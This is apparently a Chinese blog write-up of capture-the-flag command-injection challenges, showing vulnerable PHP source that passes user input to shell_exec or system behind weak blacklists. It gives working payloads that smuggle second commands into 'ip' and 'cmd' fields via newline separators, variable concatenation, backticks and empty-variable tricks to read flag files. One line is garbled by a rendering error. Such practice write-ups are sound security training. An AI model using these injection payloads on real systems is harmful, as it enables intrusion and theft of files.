刷题——命令执行

最新推荐文章于 2024-04-26 16:19:01 发布

Y3pro

最新推荐文章于 2024-04-26 16:19:01 发布

阅读量2.4k

点赞数

文章标签： php 安全 linux

本文链接：https://blog.csdn.net/Little_jcak/article/details/122353318

版权

命令执行

1、云演平台-ping

命令分隔符

linux系统下： %0a  %0d ; &  && | ||

windows系统下： windows中：%0a、&、|、%1a（.bat文件分隔符）

index.php的内容

<?php
	error_reporting(0);
	// Get input
	if(isset($_GET['ip']))
	{
		$target = $_GET['ip'];
    // var_dump($target);
	$target=trim($target);
	// var_dump($target);
	// Set blacklist
	$substitutions = array(
		'&'  => '',
		';' => '',
		'|' => '',
		'-'  => '',
		'$'  => '',
		'('  => '',
		')'  => '',
		'`'  => '',
		'||' => '',//%0A
	);

	// Remove any of the charactars in the array (blacklist).
	$target = str_replace( array_keys( $substitutions ), $substitutions, $target );
    

	// var_dump($target);

	// Determine OS and execute the ping command.
	if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
		// Windows
		
		$cmd = shell_exec( 'ping  ' . $target );
	}
	else {
		// *nix
		$cmd = shell_exec( 'ping  -c 1 ' . $target );
	}

	// Feedback for the end user
	echo  "<pre>{$cmd}</pre>";
	
	}
	else{
		echo "please input a get type parameter as ip!!";
	}
	

?>

用%0a绕过对命令分隔符的限制

?ip=127.0.0.1%0als

?ip=127.0.0.1%0acat fL4g_1s_He4r______

2、云演平台-exec

post一个payload

ip=127.0.0.1;cat /flag

3、云演平台-RCE

ls命令看当前目录下文件

在这里插入图片描述

过滤了一些字段

cat flag

想办法绕过

参考https://zhuanlan.zhihu.com/p/391439312

1、拼接绕过过滤cat

cmd=a=c;b=at;$a$b;

2、反引号绕过过滤flag

`ls`;

最终的payload

cmd=a=c;b=at;$a$b `ls`;

贴一些index.php中的源码

<?php
$cmd=$_POST['cmd'];
$blacklist="cat|\/|cd|flag|curl|{|\(|'|\"|echo|\\\\|&|grep|base64";
$arr=explode('|',$blacklist);
foreach ($arr as $key => $value) {
    #var_dump($value);
    if (preg_match("/$value/i", $cmd)) {
        exit('hacker~~~'); 
}
}
system($cmd);


?>

记录一些其他方法

使用空变量 $KaTeX parse error: Undefined control sequence: \* at position 1: \̲*̲和$ @， $x,$ {x}绕过

cmd=a=fla;b=g.php;ca$*t $a$b;

cmd=ca$*t fla$*g.php

使用替代法，代替cat

cmd=vim fla$*g.php  //编辑文件

cmd=more fla$*g.php  //一页一页显示内容

cmd=less fla$*g.php
    
cmd=nl fla$*g.php   //为输出内容加上编号

查看文件及内容处理命令（21 个）
cat	全拼 concatenate，功能是用于连接多个文件并且打印到屏幕输出或重定向到指定文件中。
tac	tac 是 cat 的反向拼写，因此命令的功能为反向显示文件内容。
more	分页显示文件内容。
less	分页显示文件内容，more 命令的相反用法。
head	显示文件内容的头部。
tail	显示文件内容的尾部。
cut	将文件的每一行按指定分隔符分割并输出。
split	分割文件为不同的小片段。
paste	按行合并文件内容。
sort	对文件的文本内容排序。
uniq	去除重复行。oldboy
wc	统计文件的行数、单词数或字节数。
iconv	转换文件的编码格式。
dos2unix	将 DOS 格式文件转换成 UNIX 格式。
diff	全拼 difference，比较文件的差异，常用于文本文件。
vimdiff	命令行可视化文件比较工具，常用于文本文件。
rev	反向输出文件内容。
grep/egrep	过滤字符串，三剑客老三。
join	按两个文件的相同字段合并。
tr	替换或删除字符。
vi/vim	命令行文本编辑器。

Y3pro

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
刷题——命令执行

命令执行1、云演平台-ping命令分隔符linux系统下： %0a %0d ; & && | || windows系统下： windows中：%0a、&、|、%1a（.bat文件分隔符）index.php的内容<?php error_reporting(0); // Get input if(isset($_GET['ip'])) { $target = $_GET['ip']; // var_dump($target); $t
复制链接

扫一扫